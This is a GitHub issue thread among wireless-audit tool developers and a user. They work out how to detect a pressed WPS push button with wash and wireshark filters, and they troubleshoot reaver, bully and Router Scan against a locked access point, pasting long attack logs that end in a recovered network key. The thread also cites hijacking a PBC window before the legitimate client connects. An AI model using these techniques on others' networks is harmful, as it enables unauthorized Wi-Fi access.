Open minanagehsalalma opened 2 years ago
rofl0r
commented
2 years ago there's currently no code in wash or similar tools to know whether the button was pushed. you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d30ce7809015bae46a7b5e10957e762e269e01a26ab7b8f7accb146520c1f8/68747470733a2f2f692e696d6775722e636f6d2f71565138526e672e706e67 from wireshark.
minanagehsalalma
commented
2 years ago there's currently no code in wash or similar tools to know whether the button was pushed. you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d30ce7809015bae46a7b5e10957e762e269e01a26ab7b8f7accb146520c1f8/68747470733a2f2f692e696d6775722e636f6d2f71565138526e672e706e67 from wireshark.
@rofl0r Oh! Thanks a lot
So i need to sniff using airodump
and wait for some one to press the button and connect ? and use the values exchanged between them and the router
To get the password ?
But how do i actually extract these values from a wireshark capture ?
Also this isn't what i meant
I need to detect whether the button was pushed or not without me or some one try to connect to it
so i can act on it if i notice the button was pushed then i can choose to connect to it or not
I read Here at wifiphisher wpspbc extension That you can detect if a button was pushed or not without needing for someone to connect to it , by just sniffing A WPSPBC IE .... But i wasn't able to understand how
or if it's possible to do it manually
Thanks again for your response It really helps as i found no mention about the matter online
rofl0r
commented
2 years ago So i need to sniff using airodump and wait for some one to press the button and connect ? and use the values exchanged between them and the router
yes, or using wireshark, or tcpdump or any other tool that can capture packets from monitor if
But how do i actually extract these values from a wireshark capture ?
expand the headers of M1-M7 and look for the relevant fields
I need to detect whether the button was pushed or not
you're the first person needing it so far, so nobody has implemented it. PR adding it to wash is welcome.
minanagehsalalma
commented
2 years ago expand the headers of M1-M7 and look for the relevant fields
@rofl0r what filter do i use to find the m1-m7 headers ?
what about this
I need to detect whether the button was pushed or not without me or some one try to connect to it
so i can act on it if i notice the button was pushed then i can choose to connect to it or not
I read Here at wifiphisher wpspbc extension That you can detect if a button was pushed or not without needing for someone to connect to it , by just sniffing A WPSPBC IE .... But i wasn't able to understand how
is it possible or not ?
you're the first person needing it so far
Not really as i mentioned above , wifiphisher needed it and this too "hostbase"
They use an evil twin attack and ask the user to push the button instead of a password .... but they have to stop the deauth of the target clients , So they be able to check if the button was pushed or not as they wasn't able to figure out a way to check by just monitoring
Googling the problem i found a lot of people asking about it but not able to figure it out
And here too they had to use an alternative method because they weren't able to figure out how
https://www.wifi-libre.com/topic-596-vulnerabilidad-wps-pbc-push-button.html
I just want to figure out how to do it using airodump-ng without any one trying to connect
thanks
rofl0r
commented
2 years ago @rofl0r what filter do i use to find the m1-m7 headers ?
can't recall from the top of my head. just record a WPS session (even if wrong pin) to your router and look at the packets. wireshark somewhere mentions those are iirc EAP packets and also has the info whether M1, etc somewhere listed.
is it possible or not ?
i don't know. you best experiment with your own router and compare packets before you push the button and after. in other words, i can't help you further, you gotta dig into this yourself.
minanagehsalalma
commented
2 years ago i don't know. you best experiment with your own router and compare packets before you push the button and after. in other words, i can't help you further, you gotta dig into this yourself.
@rofl0r oh thanks a lot you helped me a lot so far
I was able to find it i captured Two captures one without the WPS PBC button pressed and one with the button pressed I let it sniff for the whole 2 minutes duration of the PBC connection allowance
Then i tried all the WPS PBC filters from the wireshark wiki
And only two filters showed no results on the non pbc capture
while showing a lot of results on the one with pbc pressed
The three filters are
wps.selected_registrar_config_methods.phy_pushbutton
wps.selected_registrar_config_methods.pushbutton
wps.selected_registrar_config_methods
and this one i found by looking at the packets
wps.device_password_id
Now that we know which filters are needed
I still don't know how to do it from the terminal using tcpdump
I am trying to do something like this , but i can't figure out the syntax for using tcpdump and if the matches are zero or not just from bash
HEREAGAIN
If tcpdump wps.selected_registrar_config_methods != 0
then echo "The button has been pushed"
break;
else
sleep 10
goto HEREAGAINI linked the Two capture files if that would help
Thanks a lot
minanagehsalalma
commented
2 years ago there's currently no code in wash or similar tools to know whether the button was pushed.
@rofl0r i think that i have found a tool
but it works on older systems with python 2.7 only wps2key.py
Looks like scapy was the key all along haha
rofl0r
commented
2 years ago a thing that comes to mind is the json mode of wash (wash -j). it also lists stuff like that.
minanagehsalalma
commented
2 years ago a thing that comes to mind is the json mode of wash (wash -j). it also lists stuff like that.
@rofl0r oh thanks a lot you are right
But it misses wps.device_password_id and Selected Registrar config methods Even tho wps2key.py is able to see them, And it's a bit slower but no problem
I am trying to do a check using this syntax
wash -i wlan0 -j -b XX:73:8F:XD:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes
But it only prints Yes after i kill it using ctrl + c 😥
anyway thanks a lot you helped me a lot so far
PR adding it to wash is welcome.
Yeah just add another column with WPS PBC with text Not pushed / pushed in front of each AP in case of a "wps_selected_registrar" match , but that should turned on only if an argument is used like --PBC or something as it slows the scan , and as a bonus you can add an option To make it auto connect when A match is found
Does the wps lock matter when using the PBC ? my network has the lock status as true but i found no problem connecting using pbc tho Is that the case with all APs ?
But for some reason Reaver -K -L fails Even using the -N option doesn't help
This error occaurs on the router
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
5a 79 78 65 6c XXXXX
WPS: Model Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 XXXX-XXXX
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 XXXXX
WPS: Serial Number - hexdump_ascii(len=4):
31 32 33 34 1234
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 XXXXX-XXXX
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 96 72 d5 07 90 3b bf 16 7d b1 1e d5 5a 2f 95 78
WPS: UUID-R - hexdump(len=16): 1a f0 6e 79 80 f3 c4 95 bc 93 14 ee 2b 27 89 9b
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
DH: public value - hexdump(len=192): 59 8f 9e 90 ad a4 ae e1 96 1f 2e dd e7 61 a6 ef e1 81 bd 07 0f 4e 8e 51 bd 71 5e 9c 08 01 ca b7 6e 6c 43 23 c1 35 3c a2 bf 08 9a 12 22 b7 03 bf 6c 39 46 b0 bd a2 16 ae 5f 4e 85 2b d4 38 b0 a7 01 4d 3c 2c 0a dc cb 47 77 7c e3 71 4e 9a 00 bb b9 8b 3d a0 72 08 56 62 df 4c 54 80 a3 c1 35 46 b8 fe 95 54 5a f8 de 6f 98 3f 3e 38 6f 96 60 7c ad e8 6f 40 c0 d8 35 a4 f9 6c eb 78 7d 39 89 88 ca 13 e6 2a cb 6e f7 d6 b2 c5 4a 94 c5 67 37 1f e5 27 98 33 53 26 ef a9 96 e7 75 e8 4a eb ba 20 bb d5 44 70 80 80 c6 0a db 32 04 91 f3 dd c6 e7 9d 62 84 a8 b4 35 06 74 b3 6e da cd 2e fb fc e4
WPS: DH Private Key - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
WPS: DH own Public Key - hexdump(len=192): 59 8f 9e 90 ad a4 ae e1 96 1f 2e dd e7 61 a6 ef e1 81 bd 07 0f 4e 8e 51 bd 71 5e 9c 08 01 ca b7 6e 6c 43 23 c1 35 3c a2 bf 08 9a 12 22 b7 03 bf 6c 39 46 b0 bd a2 16 ae 5f 4e 85 2b d4 38 b0 a7 01 4d 3c 2c 0a dc cb 47 77 7c e3 71 4e 9a 00 bb b9 8b 3d a0 72 08 56 62 df 4c 54 80 a3 c1 35 46 b8 fe 95 54 5a f8 de 6f 98 3f 3e 38 6f 96 60 7c ad e8 6f 40 c0 d8 35 a4 f9 6c eb 78 7d 39 89 88 ca 13 e6 2a cb 6e f7 d6 b2 c5 4a 94 c5 67 37 1f e5 27 98 33 53 26 ef a9 96 e7 75 e8 4a eb ba 20 bb d5 44 70 80 80 c6 0a db 32 04 91 f3 dd c6 e7 9d 62 84 a8 b4 35 06 74 b3 6e da cd 2e fb fc e4
WPS: DH Private Key - hexdump(len=192): 57 75 d4 3a df 41 7c 4c 15 37 db e1 18 a2 c8 46 bb a6 28 76 97 0c a7 28 b6 92 e5 08 ab 94 5d a5 01 5f 43 88 7b 52 0a 96 9a 62 dc ce 5b a2 4b 8f 47 97 ef ae d4 1a ad e7 2f 6e 07 09 c6 9d 1e 21 f3 5d fb 5e 59 5a 55 a6 b6 c2 fe bf f1 85 9d 17 36 69 70 85 6f ec 78 37 66 9f 59 f3 23 0a 4f 48 7c a1 bb 4c 50 04 5f 7c 22 e0 09 22 b7 82 e8 c4 aa ff ca f2 3c 33 24 09 16 28 1a f9 be d2 ff b5 ad 6c 5c 0c 8f 4f cd 4b 98 e4 a8 17 6f e2 87 ef 7d 2a 81 10 db be 32 46 30 7a 5e 38 19 49 39 e9 3e e1 90 7e 0a 3f bb c2 6c 17 ee 1b 43 df fb 01 0b 7b 26 b0 17 eb ad 93 eb 94 4b 1f 1f 25 b2 a5
WPS: DH peer Public Key - hexdump(len=192): a0 51 19 12 7b c8 18 8a d4 2f 86 93 d9 9b 13 16 50 6b a8 01 0c f9 89 86 99 c1 db 14 9d 74 2c 12 17 a4 a6 9f ca 5f 10 17 9d 47 ae 78 ec af 5e 1c e2 2d d9 5c 16 3d d4 f4 4a 40 10 86 58 ab 38 59 94 8b 5c 88 9f c1 e1 22 b4 99 77 e6 63 e4 da 38 f1 29 a3 2b 3f 86 93 7b 7c c1 52 ef 6f c8 57 87 82 32 d2 84 09 e6 2c 9c 81 80 2f dc ca 21 41 5c bc 06 94 7d 69 3e ba 5c e2 a7 27 b1 2f 01 a3 56 69 f7 27 96 70 c1 f7 60 10 fb 02 2e 24 1a 99 0e 4f 7f 9e 43 ea a3 c2 c2 a8 38 b5 bb 12 1a 64 74 ec bb 54 40 45 68 5e ba f5 1a db 57 43 b1 87 df 7a 6f 68 cc da ac 6b cd 8c 2e 85 2a 57 04 18 ca
DH: shared key - hexdump(len=192): cc 7a 77 54 14 9d 4e 6f cd e9 6d 53 9f 8e ae 16 f1 e5 cd 7c 3b 1c a9 65 a6 f9 a0 7d 9f b2 3a 6a 7b 29 4b 50 7f 86 85 79 6d fb b6 cb d1 cc 1d ce 7e 73 d5 4e 84 c7 d5 18 3a fc bd 4f 39 5a 9d 39 94 ef 57 0c 92 f0 65 bc 74 69 ab fa 04 3e 5d 64 ca 6a 05 16 aa 8a f3 88 96 f6 14 da d8 ba d2 fc f0 97 1e d1 01 62 61 41 db 02 cc 65 13 29 84 62 e6 86 f7 cf bb 86 0d 76 94 41 42 f7 19 6e ce dc 5e 27 e0 81 03 17 32 be 87 f0 b8 60 78 03 f2 1e 30 3d 52 99 9a 2b 74 fe 1e 0a a8 e4 09 d1 88 35 cd ff b9 62 0d 6f b9 fe 6d fc c3 5e 96 80 79 7b f3 68 03 38 a3 1f 01 b8 0d 2c 17 5d c8 46 e7 ae
WPS: DH shared key - hexdump(len=192): cc 7a 77 54 14 9d 4e 6f cd e9 6d 53 9f 8e ae 16 f1 e5 cd 7c 3b 1c a9 65 a6 f9 a0 7d 9f b2 3a 6a 7b 29 4b 50 7f 86 85 79 6d fb b6 cb d1 cc 1d ce 7e 73 d5 4e 84 c7 d5 18 3a fc bd 4f 39 5a 9d 39 94 ef 57 0c 92 f0 65 bc 74 69 ab fa 04 3e 5d 64 ca 6a 05 16 aa 8a f3 88 96 f6 14 da d8 ba d2 fc f0 97 1e d1 01 62 61 41 db 02 cc 65 13 29 84 62 e6 86 f7 cf bb 86 0d 76 94 41 42 f7 19 6e ce dc 5e 27 e0 81 03 17 32 be 87 f0 b8 60 78 03 f2 1e 30 3d 52 99 9a 2b 74 fe 1e 0a a8 e4 09 d1 88 35 cd ff b9 62 0d 6f b9 fe 6d fc c3 5e 96 80 79 7b f3 68 03 38 a3 1f 01 b8 0d 2c 17 5d c8 46 e7 ae
WPS: DHKey - hexdump(len=32): ff 23 d1 1f 1f 0c be 3c 41 4f dc 00 f5 e5 70 32 a2 c0 3e c3 d0 2b 77 22 6b 3d ca 3c d3 0e db 99
WPS: KDK - hexdump(len=32): be 3e 80 5c db 6f 80 68 bf 26 bb d9 89 f5 5e e4 3b ac f0 41 58 7a 09 3f 82 21 84 1f a5 75 28 fa
WPS: AuthKey - hexdump(len=32): 37 ae c3 76 92 46 df 3f 84 fe 71 32 c2 cd e5 a5 ea 21 63 ed c6 a4 06 b8 40 54 cc 47 ca 94 6a be
WPS: KeyWrapKey - hexdump(len=16): 71 56 a6 35 29 8f ac fa a5 10 d4 31 a2 e6 7a 2e
WPS: EMSK - hexdump(len=32): fc 1f da 04 ae 73 88 90 29 5f c4 1a 59 13 ed a5 b4 48 aa 27 11 a2 de 7e 0d 2d 47 d9 ef fd 2c 7b
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
Even that using Pixie dust on Routerscan success with no problem in the same situation ! What the problem ??
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "00000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] PKE: 8AD2042450A59BA8BC7FA54E8B744D4407F4D1CCC7608B8BBCB6D43FF1302540FEAABA1EE3BFB9448D790047817003066623861D5XXXXXXXXXXXXXXXXX179ED4BCBEC8497F1352F8195C54FF52008560EB924CFBBA00644651AEC7D987939B736ECF0AAAB9D46165A874FF995956B925B9F14507831B969C88C8D8455423851239774465ABE338407FDBC75E900FABA50AF544C02224A34C3A1BFA5BE36733656535F08D5310EE4ECC56F570B49EB26681E88ECC48251225DB
[*] Received WPS Message M2.
[*] R-Nonce: 65F27C09AEBXXXXXXXXXX1F98FD9
[*] PKR: FFD666E8F35F7FCD889998CC22FBF2C1C76ACCF0773CA7D8974AC11A5237629512B62780633391C7333C034AA5CC60B79B26E7C8E63DF6CXXXXXXXXXXXXXXXXXXXXXXXXXXE68551F309B2A6527A9FF160AD241F08640D9522B5DC4C91AAB61B26E0087F24B7B7C46BEE2C220F0DF985774F08C17F4A1741E24E0FF7DC8AE2FD9033BF733702D3FCC4F081B6BA48093D7A3070D08EA115115EB879782445A80E4B8822657318DA00357262C33FC3D1D4D8CC022450CDA187BC4819F412A67
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] AuthKey: DF8FD6BF19BA5C060D7EBCDXXXXXXF1888F8564D1BF0F2226D6EC1A7F0
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] R-Hash1: DDF3FC51F7398E513CEE0XXXXXXXXA52E6234995F3FDFA
[*] R-Hash2: 6E3CA58ECC37CB199C2A799XXXXXA5EF10EC231CAC76D75D1DDD2A5145C4F2
[*] R-S1: 04A9C4BABD12E060XXXX56089F57CC
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] R-S2: 820C0D464FC46D551C9FXXXx51115
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
This is Router scan configuration
Even when disabling PixieDust it still works !
[*] Audit started at 2022.01.23 23:00:45 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Warning: R-Hash2 security check failed.
[*] The AP sent wrong 2nd pin part.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.23 23:00:58 (UTC+02:00).
Second : Why Wash doesn't refresh results ? i Mean it only outputs each network status for once for each run And needs to Exit and then start again for status refresh and using -s scan mode doesn't make any diff ! so ...
rofl0r
commented
2 years ago What the problem ??
i don't know, maybe @binarymaster can shed some light on this difference.
Second : Why Wash doesn't refresh results ?
because wash isn't a tool for real-time monitoring, but for one-shot information gathering. in order to work as you want, you'd need to start it in a way it's automatically terminated after e.g. one sec (like sending a SIGALRM to it, iirc there's some shell tool to achieve that), and only using the channel of the target ap.
minanagehsalalma
commented
2 years ago and only using the channel of the target ap.
@rofl0r hmm what do you mean ?
there's some shell tool to achieve that
What's its name?
i don't know, maybe @binarymaster can shed some light on this difference.
Yeah cause i even tried bully and it still fails
bully wlan0mon -c 3 -b XX:3E:XX:40:XX:21 -v 4 -p 1234567 --lockignore
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan0mon' to channel '3'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'XX:XX:XX:21:XX:bb' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:3E:XX:40:XX:21' on channel '3'
[+] Got beacon for 'XXXXXXXXXXXXXX' (XX:3E:XX:40:XX:21)
[!] Beacon information element indicates WPS is locked
[+] Index of starting pin number is '1234567'
[+] Last State = 'NoAssoc' Next pin '12345670'
[+] Rx( ID ) = 'Timeout' Next pin '12345670'
[+] Rx( ID ) = 'Timeout' Next pin '12345670'
binarymaster
commented
2 years ago Does the wps lock matter when using the PBC ?
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
i don't know, maybe @binarymaster can shed some light on this difference.
I'm actually tracking this thread from the beginning :smile: Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.
rofl0r
commented
2 years ago i don't know, maybe @binarymaster can shed some light on this difference.
I'm actually tracking this thread from the beginning 😄
i suspect the problem lies here in reaver code/output:
WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
...
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4what does routerscan do differently here than reaver?
there's some shell tool to achieve that
What's its name?
if i would recall i'd already told you. google "shell terminate command after 1 sec"
and only using the channel of the target ap.
@rofl0r hmm what do you mean ?
the idea is that you run wash in a loop targeting only the channel the device uses so no time is wasted scanning different channels, and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.
binarymaster
commented
2 years ago what does routerscan do differently here than reaver?
I think Router Scan just ignores what the AP sends in the "Device Password ID" field.
However when it's configured to Enrollee mode, it sends M1 message first, and the "Device Password ID" is equal either to 0 (PIN mode) or 4 (PBC mode) - depending on what setting is chosen in the GUI.
rofl0r
commented
2 years ago i currently don't have a router with wps button available to test this. maybe @feitoi is interested to look into what's going wrong here ?
minanagehsalalma
commented
2 years ago you're the first person needing it so far, so nobody has implemented it.
😏😏
I'm actually tracking this thread from the beginning 😄 Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.
@rofl0r Haha see ?
@binarymaster You can use the waircut method , it's on windows too
Directed against any AP in the radius of action. It scans all the APs until it detects one that has started the push-button protocol and tries to connect to it before the legitimate client does. You will see that while it is scanning, the list of Aps is continually updating, both the signal level of each one and the number of them, it is like having a continuous scan, so to speak.
Source : Liberada la versión 1.9
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
oh
if i would recall i'd already told you. google "shell terminate command after 1 sec"
Thanks i was able to do it using the timeout function
Even that i want to get it to go in loop if not found, but this will work
timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes
and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.
Hmm or you can connect using wpa_cli wps_pbc But if you like to go the sniffing method, then why not just airodump on the wanted channel all the time ?
I think Router Scan just ignores what the AP sends in the "Device Password ID" field.
So.... when the
Device Password ID is equal to
4 (PBC mode)It still continues to use the same method it was set to use ? How is that possible that Pin method is able to work on routerscan when the Device Password ID is 4 which means PBC only? That doesn't make any sense
i also noticed that when even the wps method is set PUSH BUTTON AS enrollee It still asks for a Pin!
That doesn't seem right to me !
Thanks
feitoi
commented
2 years ago Hello everybody!
In my a modified version of wash, I put to monitor wps_selected_registrar, and my analysis is:
"wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode, and these routers, 95% or more are vulnerable to Pixie Dust attack, I also believe these routers disable/vanish WPS function if it doesn't end with WSC_NACK, but this issues has already been solved in reaver.
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
I confirm, @binarymaster
But for some reason Reaver -K -L fails Even using the -N option doesn't help What the problem ??
When WPS button was pushed, the AP temporarily change the PIN to 00000000 and change lock flag to unlocked or not, if AP is not vulnerable to Pixie Dust attack then reaver will not work. Better to add -p 00000000 and it responds don't restore previous session.
Does the wps lock matter when using the PBC?
Matter to reaver, reaver needs WPS unlocked. Update reaver and I believe you will see nack code is 0x000F see my comment
minanagehsalalma
commented
2 years ago Hello everybody!
Hello @feitoi
In my a modified version of wash, I put to monitor
wps_selected_registrar, and my analysis is:"wps_selected_registrar" : 01does not mean all routers are in PBC mode, some routers also have"wps_selected_registrar" : 01in PIN mode
Hmmm interesting, So how do we actually use Wash to detect if the WPS button was pushed or not ?
I would have used wps.device_password_id == 0x0004 but wash doesn't show that in the Json mode
Also does the same thing happen for this filter too ?
wps.selected_registrar_config_methods.pushbutton
and change lock flag to unlocked or not
Nah the lock doesn't get cleared for me when i push the button , Idk if it gets cleared during the 120 seconds and not after or not... but it's currently still locked after pressing it like dozen times
Better to add -p 00000000 and it responds don't restore previous session.
So.... That way Reaver would work with PBC ?
Matter to reaver, reaver needs WPS unlocked
But why , When it doesn't matter if the WPS button is pushed , the lock doesn't matter as you said.
In my a modified version of wash, I put to monitor
wps_selected_registrar, and my analysis is:"wps_selected_registrar" : 01does not mean all routers are in PBC mode, some routers also have"wps_selected_registrar" : 01in PIN mode
Dang it , That means I answered my question wrong on unix.stackexchange 😥
rofl0r
commented
2 years ago @minanagehsalalma
I was able to find it i captured Two captures
it seems google drive wants me to login, so i cant download. can you upload it to 0x0.st instead ?
minanagehsalalma
commented
2 years ago it seems google drive wants me to login, so i cant download. can you upload it to 0x0.st instead ?
why this weird site
@rofl0r
Here it's WPS PBC.zip
minanagehsalalma
commented
2 years ago I see that @drygdryg added a --push-button-connect : Run WPS push button connection option
Can you tell Us how you added the
Also , Can it take a channel and bssid as an argument ?
Update reaver and I believe you will see nack code is 0x000F see my comment
@feitoi Yeah just tested it , and it works Great
But Then what does the
-L, --ignore-locks Ignore locked state reported by the target AP Actually do currently ?
oh never mind 😅
I have Checked the Wi-Fi Protected Setup Specification And it's quite an interesting read , It has all the answers ... so about the AP setup locked
Reaver doesn't have to exit when it detects the setup is locked but maybe if it also detects the device password id set to PBC then it should try PBC too
Anyway This what caught my Eyes from the documentation
The AP informs Enrollees that the Selected Registrar is in PBC mode using Probe Response messages
The Enrollee performs this scan by sending out probe requests with a Device Password ID indicating that the Enrollee is in PBC mode and receiving probe responses indicating a Selected Registrar with a PBC Device Password ID.
When an AP receives a Selected Registrar and Device Password ID indicating PBC mode from a Registrar, it MUST automatically remove this information and no longer include it in probe responses after an interval of Walk Time has elapsed.
Before the Registrar’s button is pushed, the AP shall not advertise any active PBC state
Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.
